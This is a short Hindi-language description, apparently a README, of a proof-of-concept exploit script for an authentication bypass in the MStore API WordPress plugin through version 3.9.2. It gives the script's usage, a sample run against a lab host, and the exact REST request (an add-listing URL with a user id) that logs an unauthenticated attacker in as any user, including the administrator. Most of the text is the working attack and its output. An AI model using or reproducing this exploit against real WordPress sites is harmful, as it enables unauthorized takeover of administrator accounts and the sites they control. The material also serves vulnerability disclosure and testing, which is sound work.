
MStore API <= 3.9.2 - प्रमाणीकरण बाईपास
MStore API प्लगइन WordPress के लिए संस्करण 3.9.2 तक (और इसमें शामिल) प्रमाणीकरण बाईपास के प्रति संवेदनशील है। यह प्लगइन द्वारा add listing REST API अनुरोध के दौरान प्रदान किए गए उपयोगकर्ता के अपर्याप्त सत्यापन के कारण है। इससे अप्रमाणित हमलावरों के लिए साइट पर किसी भी मौजूदा उपयोगकर्ता, जैसे कि व्यवस्थापक, के रूप में लॉग इन करना संभव हो जाता है, यदि उनके पास उपयोगकर्ता आईडी तक पहुंच हो।
usage: mstore-api.py [-h] -u URL
options:
-h, --help सहायता संदेश दिखाएँ और बाहर निकलें
-u URL, --url URL WordPress साइट का URL
python3 mstore-api.py -u http://wordpress.lan
प्लगइन संस्करण 3.9.3 से नीचे है।
एक उपयोगकर्ता चुनें:
1. admin
उपयोगकर्ता आईडी दर्ज करें: 1
बधाई हो, एक संवेदनशील सिस्टम मिल गया है।
शोषण कैसे करें:
निम्नलिखित URL पर जाएँ: http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
http://wordpress.lan पर जाएँ और आपको अपने चुने हुए उपयोगकर्ता के रूप में लॉग इन हो जाना चाहिए।